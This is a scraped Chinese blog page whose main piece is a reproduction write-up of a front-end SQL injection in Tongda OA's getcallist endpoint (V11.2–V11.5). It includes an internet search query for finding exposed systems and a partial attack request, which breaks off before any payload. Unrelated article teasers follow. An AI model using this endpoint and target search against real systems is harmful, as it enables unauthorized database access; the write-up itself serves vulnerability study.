【漏洞复现-通达OA】通达OA getcallist存在前台SQL注入漏洞

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA getcallist存在前台SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

二、影响版本

● 通达OAV11.2-通达OAV11.5
三、资产测绘
● hunterapp.name="通达 OA"
● 特征
在这里插入图片描述

四、漏洞复现

POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
Host: {hostname}
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=f4f833d3; UI_COOKIE=0; PHPSESSID=u1hk9v9ar46ejfd46uk7vupu23; KEY_RANDOMDATA=18528
User-

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/688762.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

放弃Dubbo,选择最流行的Spring Cloud微服务架构实践与经验总结

Spring For All 社区作者: 纯洁,原文地址 传送门 上次写了一篇文章叫Spring Cloud在国内中小型公司能用起来吗?介绍了Spring Cloud是否能在中小公司使用起来,这篇文章是它的姊妹篇。其实我们在这条路上已经走了一年多,从16年初到…

vue3 之 数据格式化函数

在很多项目中,都会有数据字典表,前端通过请求后端拿到数据字典表里的数据,一般在页面列表上面状态数据都会是返回的数字,前端需要把数字转换成字典表里对应的数据值,下面写了一个前端写死的数据,stateMap里…

《游戏引擎架构》--学习

内存管理 优化动态内存分配 维持最低限度的堆分配,并且永不在紧凑循环中使用堆分配 容器 迭代器 未完待续。。。

C++八股—怎么把左值变成右值

左值(lvalue)和右值(rvalue)是C中一个重要的概念,用于描述表达式的属性。简单来说: 左值(lvalue):指向内存位置的表达式,可以出现在赋值运算符的左边或右边。…

Stable Diffusion ComfyUI安装详细教程

上一篇文章介绍了sd-webui的安装教程,但学习一下ComfyUI这种节点流程式的对理解AI绘画有较大帮助,而且后期排查错误会更加方便,熟练后用这种方式做AI绘画可玩性会更多。 文章目录 一、安装包说明二、安装文件介绍三、安装步骤四、汉化五、云主…

Spring 事务原理总结七

今天是二零二四年二月十八,农历正月初九。同时今天也是农历新年假期后的第一个工作日。我的内心既兴奋,又担忧,更急躁。兴奋是因为假期后的第一个工作日工作轻松;担忧是因为经过了这么长时间,我依旧没搞明白Spring事务…

【论文解读】Latency-Aware Collaborative Perception

Latency-Aware Collaborative Perception 摘要引言方法SystemSyncNet 实验 摘要 协作感知最近显示出提高单智能体感知感知能力的巨大潜力。现有的协同感知方法通常考虑理想的通信环境。然而,在实践中,通信系统不可避免地存在延迟问题,导致安…

人工智能技术应用笔记(一):SORA已来,AI将开启新纪元

目录 01. OpenAI王炸级产品视频生成模型Sora发布 02. Sora发布的潜在影响 ▎C端 / 对于普通人 ▎B端 / 对于商业公司 03. 该如何看待Sora? 1.拥抱变化,让自己成为身边最懂AI的人 2.想象自己是一家一人公司的创始人 3.保持好奇心&…

抓包分析 TCP 协议

TCP 协议是在传输层中,一种面向连接的、可靠的、基于字节流的传输层通信协议。 环境准备 对接口测试工具进行分类,可以如下几类: 网络嗅探工具:tcpdump,wireshark 代理工具:fiddler,charles&…

JavaScript:隐式类型转换与显式类型转换

文章目录 隐式类型转换(Implicit Type Conversion)1、字符串与数字的转换2、非布尔值到布尔值的转换3、在相等性比较中的转换4、对象到基础类型的转换5、在算术运算符中的其他转换 显式类型转换(Explicit Type Conversion)1、Numb…

学员回访 | 天爷啊!我找到月薪16K的工作了!

终于轮到我说了!!!我!!!这一刻!!!我感觉全世界都没有我幸福!!!普通二本学历的我,竟然真的找到了一个16k的工作&#xff01…

面试:正确率能很好的评估分类算法吗

正确率(accuracy) 正确率是我们最常见的评价指标,accuracy (TPTN)/(PN),正确率是被分对的样本数在所有样本数中的占比,通常来说,正确率越高,分类器越好。 不同算法有不同特点,在不同…

上传包到npm

切换自己的npm源(需要切到npm源 我npm注册的账户) 切换为npm源:npm config set registry https://registry.npmjs.org 添加用户 npm adduser 查看是否成功 npm who am i 发包 npm publish 删除指定包版本 npm unpublish 【包名版本号】

springboot745简历系统

springboot745简历系统 获取源码——》公主号:计算机专业毕设大全

绝绝子!你的服务器赞助,我们的开源社区就能飞跃式升级,你绝对不想错过

在当今这个信息爆炸的时代,学习已经成为了我们生活中不可或缺的一部分。然而,随着互联网的高速发展,越来越多的技术知识被涌现出来,让人们在学习的道路上感到困惑和迷茫。为了解决这个问题,我们团队正在开发一个开源项…

尝试以语法对照表格形式学习新语言:c,rust

以语法对照表格形式学习新语言,以rust为例。 关于rust的个人看法: 能否替代c?部分场景可以,长远看并不会。如果c再扩一些关键字,类似cpp的吸星大法式扩充,rust并不具备优势。解决了c的内存管理问题&#x…

【JavaEE】_HTTP响应

目录 1. 首行 2. 报头header 3.空行 4. 正文body 1. 首行 响应首行:版本号状态码状态码描述; HTTP状态码描述了这次响应的结果(比如成功、失败,以及失败原因等); 1. HTTP状态码有: &#…

Vue框架与前端部署:构建现代化Web应用的利器

在当今数字化时代,Web应用的开发已成为企业业务发展的关键一环。前端开发作为Web应用的重要组成部分,扮演着至关重要的角色。Vue框架作为一种现代化的前端开发工具,以其简洁易用、高效灵活的特点备受开发者青睐。而前端部署则是将开发的前端代…

Spring中 Bean 的六种作用域官方说明

在 Spring 中有6种 Bean 作用域,分别为: 1、singleton(单例作用域) 2、prototype(原型作用域) 3、request(请求作用域) 4、session(会话作用域) 5、applicati…

如何在 Linux 系统中查看系统日志

Linux 系统提供了强大的日志功能,可以记录系统和应用程序的各种事件和错误信息。系统日志对于故障排除和性能监控非常重要。 图片 一、使用命令行工具查看系统日志 使用 journalctl 命令查看系统日志:journalctl 命令是 systemd 日志管理器的客户端工具,它可以查看 system…